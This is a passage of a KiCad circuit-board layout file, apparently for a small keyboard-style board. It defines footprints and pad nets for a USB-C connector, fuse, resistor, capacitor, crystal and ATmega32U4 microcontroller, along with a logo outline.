(xy -7.656656 -1.378428) (xy -7.692573 -1.460829) (xy -7.726785 -1.539507) (xy -7.758627 -1.612923)
(xy -7.787439 -1.679541) (xy -7.812556 -1.737824) (xy -7.833316 -1.786235) (xy -7.849056 -1.823237)
(xy -7.859114 -1.847292) (xy -7.862343 -1.855402) (xy -7.870355 -1.887796) (xy -7.875154 -1.929944)
(xy -7.876105 -1.958265) (xy -7.875329 -1.993892) (xy -7.871684 -2.021192) (xy -7.86344 -2.047348)
(xy -7.848865 -2.079548) (xy -7.844961 -2.087501) (xy -7.808068 -2.14586) (xy -7.761344 -2.190675)
(xy -7.703667 -2.222924) (xy -7.679427 -2.231834) (xy -7.668443 -2.235173) (xy -7.65695 -2.237901)
(xy -7.643437 -2.240017) (xy -7.626392 -2.241526) (xy -7.604302 -2.242427) (xy -7.575656 -2.242724)
(xy -7.538942 -2.242417) (xy -7.492647 -2.241509) (xy -7.435259 -2.240001) (xy -7.365267 -2.237896)
(xy -7.281157 -2.235194) (xy -7.196827 -2.232411) (xy -7.110408 -2.229484) (xy -7.027475 -2.226565)
(xy -6.949889 -2.223729) (xy -6.879511 -2.221046) (xy -6.818203 -2.218591) (xy -6.767824 -2.216437)
(xy -6.730236 -2.214657) (xy -6.707301 -2.213322) (xy -6.70439 -2.213095) (xy -6.648146 -2.208263)
(xy -6.572806 -2.303299) (xy -6.497465 -2.398334) (xy -6.606891 -2.877684) (xy -6.632229 -2.989088)
(xy -6.653854 -3.085358) (xy -6.671962 -3.167835) (xy -6.686749 -3.237861) (xy -6.698412 -3.296777)
(xy -6.707147 -3.345924) (xy -6.713152 -3.386644) (xy -6.716622 -3.420279) (xy -6.717755 -3.448169)
(xy -6.716746 -3.471657) (xy -6.713792 -3.492083) (xy -6.70909 -3.510789) (xy -6.702836 -3.529117)
(xy -6.702475 -3.530078) (xy -6.671521 -3.58996) (xy -6.628628 -3.640235) (xy -6.576206 -3.679065)
(xy -6.516665 -3.704608) (xy -6.46081 -3.7146) (xy -6.44746 -3.715083) (xy -6.432477 -3.714585)
(xy -6.414456 -3.712809) (xy -6.39199 -3.709454) (xy -6.363672 -3.704221) (xy -6.328097 -3.696812)
(xy -6.283857 -3.686925) (xy -6.229548 -3.674262) (xy -6.163762 -3.658525) (xy -6.085094 -3.639412)
(xy -5.992136 -3.616625) (xy -5.938008 -3.603305) (xy -5.851729 -3.582094) (xy -5.770271 -3.56215)
(xy -5.695134 -3.543833) (xy -5.627822 -3.527508) (xy -5.569834 -3.513534) (xy -5.522671 -3.502275)
(xy -5.487836 -3.494093) (xy -5.466829 -3.48935) (xy -5.461074 -3.488266) (xy -5.451389 -3.493565)
(xy -5.431677 -3.508099) (xy -5.404545 -3.529831) (xy -5.372598 -3.556717) (xy -5.36251 -3.565444)
(xy -5.273856 -3.642622) (xy -5.278605 -3.719961) (xy -5.280689 -3.75851) (xy -5.282983 -3.808984)
(xy -5.28543 -3.869428) (xy -5.287975 -3.937888) (xy -5.290561 -4.012407) (xy -5.293132 -4.091032)
(xy -5.295632 -4.171806) (xy -5.298005 -4.252776) (xy -5.300195 -4.331985) (xy -5.302146 -4.407479)
(xy -5.303801 -4.477303) (xy -5.305106 -4.539503) (xy -5.306002 -4.592121) (xy -5.306435 -4.633205)
(xy -5.306349 -4.660799) (xy -5.305905 -4.671508) (xy -5.291668 -4.73468) (xy -5.263901 -4.791566)
(xy -5.224826 -4.840508) (xy -5.176662 -4.879847) (xy -5.12163 -4.907925) (xy -5.061951 -4.923082)
(xy -4.999845 -4.92366) (xy -4.974167 -4.919291) (xy -4.961703 -4.915521) (xy -4.94214 -4.908109)
(xy -4.914741 -4.896716) (xy -4.878767 -4.880998) (xy -4.833479 -4.860615) (xy -4.778138 -4.835225)
(xy -4.712006 -4.804487) (xy -4.634344 -4.768061) (xy -4.544413 -4.725603) (xy -4.441475 -4.676774)
(xy -4.324791 -4.621231) (xy -4.193623 -4.558634) (xy -4.192163 -4.557937) (xy -4.148862 -4.537457)
(xy -4.110749 -4.51982) (xy -4.080493 -4.506229) (xy -4.06076 -4.497888) (xy -4.054419 -4.495799)
(xy -4.044584 -4.499756) (xy -4.023011 -4.510597) (xy -3.992647 -4.526778) (xy -3.956439 -4.546754)
(xy -3.946993 -4.552063) (xy -3.84724 -4.608327) (xy -3.768652 -5.112871) (xy -3.751427 -5.223267)
(xy -3.736461 -5.31826) (xy -3.723424 -5.399179) (xy -3.711986 -5.467355) (xy -3.701816 -5.524117)
(xy -3.692586 -5.570798) (xy -3.683965 -5.608726) (xy -3.675623 -5.639232) (xy -3.667231 -5.663647)
(xy -3.658457 -5.683301) (xy -3.648974 -5.699524) (xy -3.638449 -5.713646) (xy -3.626555 -5.726999)
(xy -3.61296 -5.740912) (xy -3.612878 -5.740994) (xy -3.560632 -5.782189) (xy -3.501765 -5.80902)
(xy -3.439001 -5.821234) (xy -3.375067 -5.818577) (xy -3.312688 -5.800793) (xy -3.26298 -5.773633)
(xy -3.249422 -5.763881) (xy -3.223743 -5.744995) (xy -3.187349 -5.718025) (xy -3.141648 -5.684019)
(xy -3.088046 -5.644027) (xy -3.027952 -5.599098) (xy -2.962772 -5.550281) (xy -2.893914 -5.498625)
(xy -2.865522 -5.477302) (xy -2.796588 -5.425587) (xy -2.73156 -5.376942) (xy -2.671726 -5.332321)
(xy -2.618374 -5.292677) (xy -2.57279 -5.258963) (xy -2.536262 -5.232134) (xy -2.510077 -5.213141)
(xy -2.495523 -5.20294) (xy -2.493067 -5.201454) (xy -2.481372 -5.202354) (xy -2.456924 -5.207728)
(xy -2.42305 -5.216738) (xy -2.383076 -5.228548) (xy -2.37356 -5.231513) (xy -2.264834 -5.265709)
(xy -2.100409 -5.725304) (xy -2.069764 -5.810712) (xy -2.040321 -5.892294) (xy -2.012657 -5.96848)
(xy -1.98735 -6.037705) (xy -1.964976 -6.098398) (xy -1.946114 -6.148994) (xy -1.931339 -6.187923)
(xy -1.92123 -6.213619) (xy -1.917104 -6.223167) (xy -1.900275 -6.250045) (xy -1.876282 -6.279971)
(xy -1.856734 -6.300244) (xy -1.802235 -6.340393) (xy -1.742117 -6.365387) (xy -1.678716 -6.374911)
(xy -1.614364 -6.368649) (xy -1.551397 -6.346288) (xy -1.543905 -6.342433) (xy -1.5321 -6.335584)
(xy -1.519462 -6.326847) (xy -1.505017 -6.315208) (xy -1.487791 -6.299653) (xy -1.46681 -6.279168)
(xy -1.4411 -6.252739) (xy -1.409686 -6.219352) (xy -1.371594 -6.177993) (xy -1.32585 -6.127648)
(xy -1.271481 -6.067303) (xy -1.207511 -5.995943) (xy -1.160068 -5.942891) (xy -1.099759 -5.875458)
(xy -1.042752 -5.811823) (xy -0.990055 -5.753102) (xy -0.942676 -5.700413) (xy -0.901624 -5.654875)
(xy -0.867904 -5.617605) (xy -0.842526 -5.589721) (xy -0.826497 -5.572341) (xy -0.820886 -5.566598)
(xy -0.811063 -5.566226) (xy -0.788382 -5.567487) (xy -0.756644 -5.570002) (xy -0.719649 -5.573391)
(xy -0.681195 -5.577271) (xy -0.645082 -5.581263) (xy -0.615111 -5.584987) (xy -0.59508 -5.588063)
(xy -0.588729 -5.589844) (xy -0.584234 -5.597358) (xy -0.57187 -5.61816) (xy -0.552398 -5.650966)
(xy -0.526579 -5.694494) (xy -0.495172 -5.747462) (xy -0.45894 -5.808587) (xy -0.418642 -5.876587)
(xy -0.375038 -5.950178) (xy -0.333793 -6.019799) (xy -0.287033 -6.098462) (xy -0.242106 -6.173514)
(xy -0.199875 -6.24355) (xy -0.161202 -6.307162) (xy -0.126949 -6.362947) (xy -0.097978 -6.409498)
(xy -0.075152 -6.44541) (xy -0.059332 -6.469276) (xy -0.052201 -6.478864) (xy -0.028249 -6.500426)
(xy 0.003054 -6.522185) (xy 0.02404 -6.533897) (xy 0.051576 -6.546135) (xy 0.076573 -6.553272)
(xy 0.105557 -6.556584) (xy 0.143933 -6.55735) (xy 0.20217 -6.55362)) (layer F.Cu) (width 0.01))
(fp_poly (pts (xy 1.786466 0.105834) (xy 1.782233 0.110067) (xy 1.777999 0.105834) (xy 1.782233 0.1016)
(xy 1.786466 0.105834)) (layer Eco2.User) (width 0.01))
(fp_text user LOGO (at 0.75 0 10) (layer F.SilkS) hide
(effects (font (size 1.524 1.524) (thickness 0.3)))
)
(fp_text user G*** (at 0 0 10) (layer F.SilkS) hide
(effects (font (size 1.524 1.524) (thickness 0.3)))
)
)
(module Connector_USB:USB_C_Receptacle_HRO_TYPE-C-31-M-12 (layer F.Cu) (tedit 5D3C0721) (tstamp 5EDAAA52)
(at 116.695 61.015 180)
(descr "USB Type-C receptacle for USB 2.0 and PD, http://www.krhro.com/uploads/soft/180320/1-1P320120243.pdf")
(tags "usb usb-c 2.0 pd")
(path /5EF5D00C)
(attr smd)
(fp_text reference J1 (at 0 -5.645) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value "USB C" (at 0 5.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -4.7 3.9) (end 4.7 3.9) (layer F.SilkS) (width 0.12))
(fp_line (start -4.47 -3.65) (end 4.47 -3.65) (layer F.Fab) (width 0.1))
(fp_line (start -4.47 -3.65) (end -4.47 3.65) (layer F.Fab) (width 0.1))
(fp_line (start -4.47 3.65) (end 4.47 3.65) (layer F.Fab) (width 0.1))
(fp_line (start 4.47 -3.65) (end 4.47 3.65) (layer F.Fab) (width 0.1))
(fp_line (start -5.32 -5.27) (end 5.32 -5.27) (layer F.CrtYd) (width 0.05))
(fp_line (start -5.32 4.15) (end 5.32 4.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -5.32 -5.27) (end -5.32 4.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 5.32 -5.27) (end 5.32 4.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 4.7 -1.9) (end 4.7 0.1) (layer F.SilkS) (width 0.12))
(fp_line (start 4.7 2) (end 4.7 3.9) (layer F.SilkS) (width 0.12))
(fp_line (start -4.7 -1.9) (end -4.7 0.1) (layer F.SilkS) (width 0.12))
(fp_line (start -4.7 2) (end -4.7 3.9) (layer F.SilkS) (width 0.12))
(fp_text user %V (at 0 0) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text user %V (at 0 0) (layer F.Fab)
(effects (font (size 0.4 0.4) (thickness 0.08)))
)
(pad B1 smd rect (at 3.25 -4.045 180) (size 0.6 1.45) (layers F.Cu F.Paste F.Mask)
(net 73 GND))
(pad A9 smd rect (at 2.45 -4.045 180) (size 0.6 1.45) (layers F.Cu F.Paste F.Mask)
(net 3 VCC))
(pad B9 smd rect (at -2.45 -4.045 180) (size 0.6 1.45) (layers F.Cu F.Paste F.Mask)
(net 3 VCC))
(pad B12 smd rect (at -3.25 -4.045 180) (size 0.6 1.45) (layers F.Cu F.Paste F.Mask)
(net 73 GND))
(pad A1 smd rect (at -3.25 -4.045 180) (size 0.6 1.45) (layers F.Cu F.Paste F.Mask)
(net 73 GND))
(pad A4 smd rect (at -2.45 -4.045 180) (size 0.6 1.45) (layers F.Cu F.Paste F.Mask)
(net 3 VCC))
(pad B4 smd rect (at 2.45 -4.045 180) (size 0.6 1.45) (layers F.Cu F.Paste F.Mask)
(net 3 VCC))
(pad A12 smd rect (at 3.25 -4.045 180) (size 0.6 1.45) (layers F.Cu F.Paste F.Mask)
(net 73 GND))
(pad B8 smd rect (at -1.75 -4.045 180) (size 0.3 1.45) (layers F.Cu F.Paste F.Mask))
(pad A5 smd rect (at -1.25 -4.045 180) (size 0.3 1.45) (layers F.Cu F.Paste F.Mask)
(net 6 "Net-(J1-PadA5)"))
(pad B7 smd rect (at -0.75 -4.045 180) (size 0.3 1.45) (layers F.Cu F.Paste F.Mask)
(net 7 "Net-(J1-PadA7)"))
(pad A7 smd rect (at 0.25 -4.045 180) (size 0.3 1.45) (layers F.Cu F.Paste F.Mask)
(net 7 "Net-(J1-PadA7)"))
(pad B6 smd rect (at 0.75 -4.045 180) (size 0.3 1.45) (layers F.Cu F.Paste F.Mask)
(net 8 "Net-(J1-PadA6)"))
(pad A8 smd rect (at 1.25 -4.045 180) (size 0.3 1.45) (layers F.Cu F.Paste F.Mask))
(pad B5 smd rect (at 1.75 -4.045 180) (size 0.3 1.45) (layers F.Cu F.Paste F.Mask)
(net 9 "Net-(J1-PadB5)"))
(pad A6 smd rect (at -0.25 -4.045 180) (size 0.3 1.45) (layers F.Cu F.Paste F.Mask)
(net 8 "Net-(J1-PadA6)"))
(pad S1 thru_hole oval (at 4.32 -3.13 180) (size 1 2.1) (drill oval 0.6 1.7) (layers *.Cu *.Mask)
(net 73 GND))
(pad S1 thru_hole oval (at -4.32 -3.13 180) (size 1 2.1) (drill oval 0.6 1.7) (layers *.Cu *.Mask)
(net 73 GND))
(pad "" np_thru_hole circle (at -2.89 -2.6 180) (size 0.65 0.65) (drill 0.65) (layers *.Cu *.Mask))
(pad S1 thru_hole oval (at -4.32 1.05 180) (size 1 1.6) (drill oval 0.6 1.2) (layers *.Cu *.Mask)
(net 73 GND))
(pad "" np_thru_hole circle (at 2.89 -2.6 180) (size 0.65 0.65) (drill 0.65) (layers *.Cu *.Mask))
(pad S1 thru_hole oval (at 4.32 1.05 180) (size 1 1.6) (drill oval 0.6 1.2) (layers *.Cu *.Mask)
(net 73 GND))
(model ${KISYS3DMOD}/Connector_USB.3dshapes/USB_C_Receptacle_HRO_TYPE-C-31-M-12.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Fuse:Fuse_1206_3216Metric (layer F.Cu) (tedit 5B301BBE) (tstamp 5EDEAD34)
(at 119.08 71)
(descr "Fuse SMD 1206 (3216 Metric), square (rectangular) end terminal, IPC_7351 nominal, (Body size source: http://www.tortai-tech.com/upload/download/2011102023233369053.pdf), generated with kicad-footprint-generator")
(tags resistor)
(path /5EF6C20F)
(attr smd)
(fp_text reference F1 (at 0 -1.82) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value 500mA (at 0 1.82) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -1.6 0.8) (end -1.6 -0.8) (layer F.Fab) (width 0.1))
(fp_line (start -1.6 -0.8) (end 1.6 -0.8) (layer F.Fab) (width 0.1))
(fp_line (start 1.6 -0.8) (end 1.6 0.8) (layer F.Fab) (width 0.1))
(fp_line (start 1.6 0.8) (end -1.6 0.8) (layer F.Fab) (width 0.1))
(fp_line (start -0.602064 -0.91) (end 0.602064 -0.91) (layer F.SilkS) (width 0.12))
(fp_line (start -0.602064 0.91) (end 0.602064 0.91) (layer F.SilkS) (width 0.12))
(fp_line (start -2.28 1.12) (end -2.28 -1.12) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.28 -1.12) (end 2.28 -1.12) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.28 -1.12) (end 2.28 1.12) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.28 1.12) (end -2.28 1.12) (layer F.CrtYd) (width 0.05))
(fp_text user %V (at 0 0) (layer F.Fab)
(effects (font (size 0.4 0.4) (thickness 0.08)))
)
(pad 2 smd roundrect (at 1.4 0) (size 1.25 1.75) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.2)
(net 3 VCC))
(pad 1 smd roundrect (at -1.4 0) (size 1.25 1.75) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.2)
(net 1 +5V))
(model ${KISYS3DMOD}/Fuse.3dshapes/Fuse_1206_3216Metric.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Resistor_SMD:R_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5EDC85D3)
(at 136.3 76.45)
(descr "Resistor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator")
(tags "resistor handsolder")
(path /5FA6C6B0)
(attr smd)
(fp_text reference R9 (at 0 -1.65) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value 10k (at 0 1.65) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12))
(fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12))
(fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1))
(fp_text user %V (at 0 0) (layer F.Fab)
(effects (font (size 0.4 0.4) (thickness 0.08)))
)
(pad 2 smd roundrect (at 1.025 0) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 33 VDD))
(pad 1 smd roundrect (at -1.025 0) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 72 "Net-(R9-Pad1)"))
(model ${KISYS3DMOD}/Resistor_SMD.3dshapes/R_0805_2012Metric.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Capacitor_SMD:C_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5EDC2D05)
(at 132.2 76.45)
(descr "Capacitor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator")
(tags "capacitor handsolder")
(path /5F9F59AE)
(attr smd)
(fp_text reference C10 (at 0 -1.65) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value 0.1u (at 0 1.65) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12))
(fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12))
(fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1))
(fp_text user %V (at 0 0 180) (layer F.Fab)
(effects (font (size 0.4 0.4) (thickness 0.08)))
)
(pad 2 smd roundrect (at 1.025 0) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 33 VDD))
(pad 1 smd roundrect (at -1.025 0) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 34 VSS))
(model ${KISYS3DMOD}/Capacitor_SMD.3dshapes/C_0805_2012Metric.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Crystal:Crystal_SMD_3225-4Pin_3.2x2.5mm (layer F.Cu) (tedit 5A0FD1B2) (tstamp 5EDCC63B)
(at 54.5 82.95 90)
(descr "SMD Crystal SERIES SMD3225/4 http://www.txccrystal.com/images/pdf/7m-accuracy.pdf, 3.2x2.5mm^2 package")
(tags "SMD SMT crystal")
(path /5F03D985)
(attr smd)
(fp_text reference Y1 (at 0 -2.45 90) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value Crystal (at 0 2.45 90) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -1.6 -1.25) (end -1.6 1.25) (layer F.Fab) (width 0.1))
(fp_line (start -1.6 1.25) (end 1.6 1.25) (layer F.Fab) (width 0.1))
(fp_line (start 1.6 1.25) (end 1.6 -1.25) (layer F.Fab) (width 0.1))
(fp_line (start 1.6 -1.25) (end -1.6 -1.25) (layer F.Fab) (width 0.1))
(fp_line (start -1.6 0.25) (end -0.6 1.25) (layer F.Fab) (width 0.1))
(fp_line (start -2 -1.65) (end -2 1.65) (layer F.SilkS) (width 0.12))
(fp_line (start -2 1.65) (end 2 1.65) (layer F.SilkS) (width 0.12))
(fp_line (start -2.1 -1.7) (end -2.1 1.7) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.1 1.7) (end 2.1 1.7) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.1 1.7) (end 2.1 -1.7) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.1 -1.7) (end -2.1 -1.7) (layer F.CrtYd) (width 0.05))
(fp_text user %V (at 0 0 180) (layer F.Fab)
(effects (font (size 0.4 0.4) (thickness 0.07)))
)
(pad 1 smd rect (at -1.1 0.85 90) (size 1.4 1.2) (layers F.Cu F.Paste F.Mask)
(net 2 "Net-(C1-Pad1)"))
(pad 2 smd rect (at 1.1 0.85 90) (size 1.4 1.2) (layers F.Cu F.Paste F.Mask)
(net 73 GND))
(pad 3 smd rect (at 1.1 -0.85 90) (size 1.4 1.2) (layers F.Cu F.Paste F.Mask)
(net 69 "Net-(C2-Pad2)"))
(pad 4 smd rect (at -1.1 -0.85 90) (size 1.4 1.2) (layers F.Cu F.Paste F.Mask)
(net 73 GND))
(model ${KISYS3DMOD}/Crystal.3dshapes/Crystal_SMD_3225-4Pin_3.2x2.5mm.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Package_QFP:TQFP-44_10x10mm_P0.8mm (layer F.Cu) (tedit 5A02F146) (tstamp 5EDCC6F7)
(at 64.5 84 270)
(descr "44-Lead Plastic Thin Quad Flatpack (PT) - 10x10x1.0 mm Body [TQFP] (see Microchip Packaging Specification 00000049BS.pdf)")
(tags "QFP 0.8")
(path /5F0A0905)
(attr smd)
(fp_text reference U1 (at 0 -7.45 90) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value ATmega32U4-AU (at 0 7.45 90) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -5.175 -4.6) (end -6.45 -4.6) (layer F.SilkS) (width 0.15))
(fp_line (start 5.175 -5.175) (end 4.5 -5.175) (layer F.SilkS) (width 0.15))
(fp_line (start 5.175 5.175) (end 4.5 5.175) (layer F.SilkS) (width 0.15))
(fp_line (start -5.175 5.175) (end -4.5 5.175) (layer F.SilkS) (width 0.15))
(fp_line (start -5.175 -5.175) (end -4.5 -5.175) (layer F.SilkS) (width 0.15))
(fp_line (start -5.175 5.175) (end -5.175 4.5) (layer F.SilkS) (width 0.15))
(fp_line (start 5.175 5.175) (end 5.175 4.5) (layer F.SilkS) (width 0.15))
(fp_line (start 5.175 -5.175) (end 5.175 -4.5) (layer F.SilkS) (width 0.15))
(fp_line (start -5.175 -5.175) (end -5.175 -4.6) (layer F.SilkS) (width 0.15))
(fp_line (start -6.7 6.7) (end 6.7 6.7) (layer F.CrtYd) (width 0.05))
(fp_line (start -6.7 -6.7) (end 6.7 -6.7) (layer F.CrtYd) (width 0.05))
(fp_line (start 6.7 -6.7) (end 6.7 6.7) (layer F.CrtYd) (width 0.05))
(fp_line (start -6.7 -6.7) (end -6.7 6.7) (layer F.CrtYd) (width 0.05))
(fp_line (start -5 -4) (end -4 -5) (layer F.Fab) (width 0.15))
(fp_line (start -5 5) (end -5 -4) (layer F.Fab) (width 0.15))
(fp_line (start 5 5) (end -5 5) (layer F.Fab) (width 0.15))
(fp_line (start 5 -5) (end 5 5) (layer F.Fab) (width 0.15))
(fp_line (start -4 -5) (end 5 -5) (layer F.Fab) (width 0.15))
(fp_text user %V (at 0 0 180) (layer F.Fab)
(effects (font (size 0.4 0.4) (thickness 0.08)))
)
(pad 44 smd rect (at -4 -5.7) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 1 +5V))
(pad 43 smd rect (at -3.2 -5.7) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 73 GND))
(pad 42 smd rect (at -2.4 -5.7) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask))
(pad 41 smd rect (at -1.6 -5.7) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 30 /row0,3))
(pad 40 smd rect (at -0.8 -5.7) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask))
(pad 39 smd rect (at 0 -5.7) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask))
(pad 38 smd rect (at 0.8 -5.7) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask))
(pad 37 smd rect (at 1.6 -5.7) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask))
(pad 36 smd rect (at 2.4 -5.7) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask))
(pad 35 smd rect (at 3.2 -5.7) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 73 GND))
(pad 34 smd rect (at 4 -5.7) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 1 +5V))
(pad 33 smd rect (at 5.7 -4 270) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 23 "Net-(R2-Pad2)"))
(pad 32 smd rect (at 5.7 -3.2 270) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask))
(pad 31 smd rect (at 5.7 -2.4 270) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask))
(pad 30 smd rect (at 5.7 -1.6 270) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 5 /col4))
(pad 29 smd rect (at 5.7 -0.8 270) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 19 /col3))
(pad 28 smd rect (at 5.7 0 270) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 17 /col2))
(pad 27 smd rect (at 5.7 0.8 270) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 18 /col1))
(pad 26 smd rect (at 5.7 1.6 270) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 14 /col0))
(pad 25 smd rect (at 5.7 2.4 270) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask))
(pad 24 smd rect (at 5.7 3.2 270) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 1 +5V))
(pad 23 smd rect (at 5.7 4 270) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 73 GND))
(pad 22 smd rect (at 4 5.7) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask))
(pad 21 smd rect (at 3.2 5.7) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask))
(pad 20 smd rect (at 2.4 5.7) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask))
(pad 19 smd rect (at 1.6 5.7) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 10 "Net-(Jack0-PadR1)"))
(pad 18 smd rect (at 0.8 5.7) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 11 "Net-(Jack0-PadT)"))
(pad 17 smd rect (at 0 5.7) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 2 "Net-(C1-Pad1)"))
(pad 16 smd rect (at -0.8 5.7) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 69 "Net-(C2-Pad2)"))
(pad 15 smd rect (at -1.6 5.7) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 73 GND))
(pad 14 smd rect (at -2.4 5.7) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 1 +5V))
(pad 13 smd rect (at -3.2 5.7) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 22 "Net-(R1-Pad1)"))
(pad 12 smd rect (at -4 5.7) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask))
(pad 11 smd rect (at -5.7 4 270) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 25 /row0,0))
(pad 10 smd rect (at -5.7 3.2 270) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 28 /row0,1))
(pad 9 smd rect (at -5.7 2.4 270) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 29 /row0,2))
(pad 8 smd rect (at -5.7 1.6 270) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask))
(pad 7 smd rect (at -5.7 0.8 270) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 1 +5V))
(pad 6 smd rect (at -5.7 0 270) (size 1.5 0.55) (layers F.Cu F.Paste F.Mask)
(net 4 "Net-(C8-Pad1)"))
